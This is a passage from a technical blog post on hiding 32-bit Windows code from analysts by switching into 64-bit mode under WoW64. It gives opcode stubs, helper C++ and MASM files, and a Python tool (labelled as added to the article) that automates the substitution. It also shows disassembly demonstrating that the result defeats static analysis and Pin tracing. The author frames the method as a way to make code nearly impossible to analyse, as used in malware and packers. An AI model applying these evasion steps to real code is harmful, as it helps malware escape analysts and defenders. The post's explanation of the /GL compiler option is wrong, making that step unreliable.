<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 051h, 048h, 0b9h ; push rcx / mov rcx, offset Key</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset Key</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 081h, 001h, 078h, 056h, 034h, 012h, 059h ; add dword ptr [rcx], 012345678h / pop rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>;-----------------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 083h, 0ech, 004h<span class="Apple-tab-span" style="white-space: pre;"> </span>; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 089h, 004h, 024h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov dword ptr [rsp], eax (save eax for later)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 08bh, 0c4h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 02bh<span class="Apple-tab-span" style="white-space: pre;"> </span>; push stack segment selector</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 50h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push stack pointer (in rax)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h, 046h, 002h, 000h, 000h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push eflags</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 023h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push code selector</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocExit<span class="Apple-tab-span" style="white-space: pre;"> </span>; push instruction pointer</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 0cfh<span class="Apple-tab-span" style="white-space: pre;"> </span>; iretq</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocExit:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>pop eax<span class="Apple-tab-span" style="white-space: pre;"> </span>; restore eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ret</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">run_asm64 ENDP </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">END</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To obtain the 64bit opcodes I've created a 64bit Visual Studio project named "<i>Dummy64</i>" containing two files: "<i>main.cpp</i>" and "<i>dummy.asm</i>".</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">"<i>dummy.asm</i>" contains the 64bit assembly code that we want to compile to obtain the corresponding binary opcodes.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">"<i>main.cpp</i>" loops through all the opcodes of the compiled "DummyAsm" routine and prints them, but first it looks for a jump (opcode 0xE9) and skips it. This is done because some compilers (Visual Studio, for instance) insert a small stub, called a "trampoline", that jumps to the function body: the check is there to skip that stub.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The code also supports a sort of relocation procedure: for example, in this POC, we use the variable "<i>Var1</i>" to refer to the "<i>Key</i>" variable in the "<i>Asm_C</i>" project.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Of course, you can use the same trick every time you want to employ in your 64bit code something that has been defined in the 32bit code. </span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">main.cpp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <windows.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <stdio.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" void DummyAsm(void);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" int Var1;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">int main(void)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>int i, Line;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>unsigned char *Routine = (unsigned char *)DummyAsm;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(Routine[0] == 0xE9) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Routine += *(int *)(&Routine[1]) + 5;<span class="Apple-tab-span" style="white-space: pre;"> </span>// rel32 is signed: follow the trampoline jump</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Line = 0;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>for(i = 0; ; i++){</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(*(unsigned long *)(&Routine[i]) == 0xAAAAAAAA) {<span class="Apple-tab-span" style="white-space: pre;"> </span>// dummy signature</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>break;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// the address of Var1 from this source will be relocated</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// with the address of Key from the 32bit source</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(*(unsigned long long*)(&Routine[i]) == (unsigned long long)&Var1) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("\n dd offset Key \n dd 0");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>i += 7;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Line = -1;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>else if(Line % 8 == 0) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("\n db 0%02xh", Routine[i]);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>else {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf(", 0%02xh", Routine[i]);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Line++;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">dummy.asm</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.DATA</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Var1 DWORD 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PUBLIC Var1</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.CODE</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">DummyAsm PROC</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">; write the code within the two lines</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">; warning: remember to preserve the registers you trash</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> push rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> mov rcx, offset Var1</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> add dword ptr [rcx], 012345678h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> pop rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> db 0AAh, 0AAh, 0AAh, 0AAh<span class="Apple-tab-span" style="white-space: pre;"> </span>; dummy signature</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">DummyAsm ENDP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">END</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To sum up, these are the steps I propose:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Create a 32bit project ("Asm_C", in this case) containing both the C/C++ files with the 32bit code and the ASM files in which you put the 64bit routines.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Each 64bit routine must contain the code to enter 64bit mode at its beginning and to leave it at its end.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Each 64bit routine must be encoded as raw opcodes (a sequence of <i>db</i> directives), obtained with the "Dummy64" project.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">If you want to use a piece of memory that was allocated by the 32bit code (a variable, an array, a structure and so on), use a different one in the 64bit routine and remember to relocate its references to the one you really refer to in 32bit, using the trick we saw in the "Dummy64" project.</span></li>
</ul>
</div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif;">5.2 - How to (nearly) automate the obfuscation</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To automate the obfuscation you can take advantage of Visual Studio itself. Use the /FA option on the Visual Studio command line (or "Project Properties -> Configuration properties -> C/C++ -> Output files -> Assembler output -> Assembly-Only Listing") together with the /GL option (or "Project properties -> Configuration properties -> C/C++ -> Optimization -> Whole Program Optimization") to obtain the assembly listings of your project, compiled without optimizations. Finally, you can assemble and link the obtained assembly files by typing "ml file_1.asm ... file_n.asm" on the Visual Studio command line.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">N.B. The /GL option is crucial, because it tells the compiler not to mix code across the project files: this way, if a routine is defined in "<i>main.cpp</i>", its assembly counterpart will be in "<i>main.asm</i>", whereas without this option, due to optimization, it could end up in any other generated assembly file and the ML command won't work.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">So you can:</span></div>
</div>
<div>
<ol>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Create a 32bit Visual Studio C/C++ project and compile it as described above.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Pick any instruction from the obtained assembly listing and replace it with a sequence of 64bit opcodes that has the same effect, taking care to add the code that jumps into and out of 64bit mode.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Assemble and link the assembly files.</span></li>
</ol>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Of course, step 2 can be automated very easily to craft your own obfuscator: it won't take long in any programming language that supports regular expressions.</span></div>
</div>
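<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added example (not code from the original article), here is such a regex-based pass in Python. It reads a MASM listing, replaces every "push imm" line with the same 64bit stub the article uses below for "push 14h", generalized to any 32bit immediate, and leaves every other line (registers, memory operands, "push OFFSET ...") alone. The selectors 23h/2Bh/33h and the EFLAGS value 246h are the ones the article's stub uses; the label names LocEnter_N/LocExit_N and the "; was:" comment are arbitrary choices of the example.</span></div>
</div>

```python
import re

# Selectors and flags used by the article's mode-switch stub on WoW64 (taken from the page).
CS32, SS32, CS64 = 0x23, 0x2B, 0x33
EFLAGS = 0x246

# A MASM "push <immediate>" line: decimal (20) or MASM hex (14h, 0FFh: hex starts with a digit).
# Registers, memory operands and "push OFFSET ..." do not match and are left untouched.
PUSH_IMM = re.compile(
    r"^(?P<ind>[ \t]*)push[ \t]+(?P<imm>\d+|[0-9][0-9A-Fa-f]*h)\b(?P<rest>.*)$",
    re.IGNORECASE | re.MULTILINE,
)


def parse_imm(text):
    """Parse a MASM immediate ('20' or '14h'); None if it does not fit in 32 bits."""
    value = int(text[:-1], 16) if text[-1] in "hH" else int(text, 10)
    return value if 0 <= value <= 0xFFFFFFFF else None


def db_list(data):
    """Format bytes as a MASM db operand list: b'\\x14\\x00' -> '014h, 000h'."""
    return ", ".join("0%02Xh" % b for b in data)


def push_imm32_stub(value, n):
    """64bit replacement for a 32bit 'push imm32': enter 64bit mode, emulate the 4-byte
    push (a 64bit push would write 8 bytes), then iretq back to 32bit mode."""
    enter, leave = "LocEnter_%d" % n, "LocExit_%d" % n
    imm = value.to_bytes(4, "little")
    return [
        "\tdb 0EAh\t\t\t\t; jmp far %02Xh:%s (enter 64bit mode)" % (CS64, enter),
        "\tdd offset %s" % enter,
        "\tdb %s" % db_list(CS64.to_bytes(2, "little")),
        "%s:" % enter,
        "\tdb 048h, 083h, 0ECh, 004h\t\t; sub rsp, 4",
        "\tdb 0C7h, 004h, 024h, %s\t; mov dword ptr [rsp], 0%Xh" % (db_list(imm), value),
        "\tdb 048h, 083h, 0ECh, 004h\t\t; sub rsp, 4",
        "\tdb 089h, 004h, 024h\t\t\t; mov dword ptr [rsp], eax (save eax)",
        "\tdb 048h, 08Bh, 0C4h\t\t\t; mov rax, rsp",
        "\tdb 06Ah, %s\t\t\t; push %02Xh (32bit ss)" % (db_list(bytes([SS32])), SS32),
        "\tdb 050h\t\t\t\t; push rax (32bit esp)",
        "\tdb 068h, %s\t; push 0%Xh (eflags)" % (db_list(EFLAGS.to_bytes(4, "little")), EFLAGS),
        "\tdb 06Ah, %s\t\t\t; push %02Xh (32bit cs)" % (db_list(bytes([CS32])), CS32),
        "\tdb 068h\t\t\t\t; push offset %s (32bit eip)" % leave,
        "\tdd offset %s" % leave,
        "\tdb 048h, 0CFh\t\t\t; iretq (back to 32bit mode)",
        "%s:" % leave,
        "\tpop eax\t\t\t\t; restore eax; the immediate is now on top of the stack",
    ]


def obfuscate_listing(asm_text):
    """Replace every 'push imm' in a MASM listing with its 64bit stub (step 2 of the
    procedure); each stub gets its own labels so the listing still assembles."""
    counter = [0]

    def repl(m):
        value = parse_imm(m.group("imm"))
        if value is None:                      # not a 32bit immediate: leave the line alone
            return m.group(0)
        lines = push_imm32_stub(value, counter[0])
        counter[0] += 1
        # keep the original instruction (and its listing comment) as a comment
        lines.insert(0, "%s; was: push %s%s" % (m.group("ind"), m.group("imm"), m.group("rest")))
        return "\n".join(lines)

    return PUSH_IMM.sub(repl, asm_text)


if __name__ == "__main__":
    # constructed sample: a fragment of a cl /FA listing
    sample = "\tpush\t20\t\t\t\t\t; 00000014H\n\tpush\tOFFSET FLAT:$SG1234\n\tpush\t0\n\tpush\teax\n"
    print(obfuscate_listing(sample))
```

<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Run it over the .asm files produced by /FA and feed the output to ml as described above. The emulated push uses "sub rsp, 4 / mov dword ptr [rsp], imm32" rather than a 64bit push precisely because the 32bit caller expects a 4-byte slot, and eax is saved and restored around the exit sequence because "mov rax, rsp" would otherwise trash a register the surrounding 32bit code may still be using.</span></div>
</div>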
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">For example, I followed these steps and replaced the assembly instruction "push 14h" with the following code:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 0EAh<span class="Apple-tab-span" style="white-space: pre;"> </span>; jump to enter 64 bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocEnter</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 033h, 000h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocEnter:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">db 048h, 083h, 0ech, 004h<span class="Apple-tab-span" style="white-space: pre;"> </span>; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">db 0c7h, 004h, 024h, 014h, 000h, 000h, 000h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov dword ptr [rsp], 14h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">;------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 083h, 0ech, 004h<span class="Apple-tab-span" style="white-space: pre;"> </span>; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 089h, 004h, 024h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov dword ptr [rsp], eax (save eax)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 08bh, 0c4h<span class="Apple-tab-span" style="white-space: pre;"> </span>; mov rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 02bh<span class="Apple-tab-span" style="white-space: pre;"> </span>; push 2Bh (32bit stack segment selector)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 50h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push rax (the 32bit stack pointer)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h, 046h, 002h, 000h, 000h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push 246h (eflags)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 06ah, 023h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push 23h (32bit code segment selector)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 068h<span class="Apple-tab-span" style="white-space: pre;"> </span>; push offset LocExit (32bit eip)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocExit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 048h, 0cfh<span class="Apple-tab-span" style="white-space: pre;"> </span>; iretq</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocExit:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>pop eax<span class="Apple-tab-span" style="white-space: pre;"> </span>; restore eax (saved above); 14h is now on top of the stack</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I then assembled and linked the files and it worked just fine. Moreover, I disassembled the executables obtained before and after the modification; here are the listings.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Before the modification:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401018 push offset aMain_txt</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D call FileCreate</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 push 14h ; the instruction we're going to replace</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401024 push offset aTestTest</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029 push 0 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102B push eax </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C mov hObject, eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401031 call FileSeekWrite</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">After the modification:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401018 push offset aMain_txt ; "main.txt"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D call FileCreate</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 jmp far ptr 33h:401029h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 _main endp ; sp-analysis failed</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 ; ---------------------------------------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029 db 48h, 83h, 0ECh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C dd 2404C704h, 14h, 4EC8348h, 48240489h, 2B6AC48Bh, 2466850h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C dd 236A0000h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401048 db 68h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401049 dd offset loc_40104F</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104D db 48h, 0CFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F ; ---------------------------------------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F loc_40104F: ; DATA XREF: .text:00401049 o</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F pop eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401050 push offset aTestTest ; "test test"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401055 push 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401057 push eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401058 mov dword_403040, eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040105D call FileSeekWrite</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Totally messy and, as I mentioned before, a very effective way to hide the parameters of a function. Note that this kind of obfuscation is really powerful: unlike with standard packers, the clear code never appears in memory ready to be dumped. You can also use this idea to implement other obfuscation techniques; for example, you can easily write a little program that scatters junk code all over the assembly listing. Also, spreading around the trick from the end of section 4, that is, filling your source with pieces of code that can be interpreted both as 32bit and as 64bit code, will be very frustrating for whoever has to analyse your program.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">6 - Evolutions</span></b></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This trick alone is very effective, but there are other good obfuscation techniques that have been used in various malware and packers. Combine the old obfuscation techniques with this new one and you can obtain code that is nearly impossible to analyze... well, not impossible, but very, very hard!</span></div>
</div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">7 - (Not) detecting the obfuscation</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I tried using Intel's Pin instrumentation toolkit (the 32bit version) to trace the test application I created, hoping that Pin would be able to identify and follow the far jumps from 32bit to 64bit mode. Unfortunately, Pin does not seem to handle these jumps either (I also found people reporting this problem on the official Pin forum). This is the source code of the Pintool I wrote:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <stdio.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include "pin.H"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">namespace WINDOWS</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#include <windows.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">FILE * OutTrace;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ADDRINT ExceptionDispatcher = 0;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">bool LastJmp64 = false;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">// Analysis routine, called before every instruction: reports the instruction that</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">// follows a far jump to 64bit mode and checks whether this instruction is one</span></div>
<div>
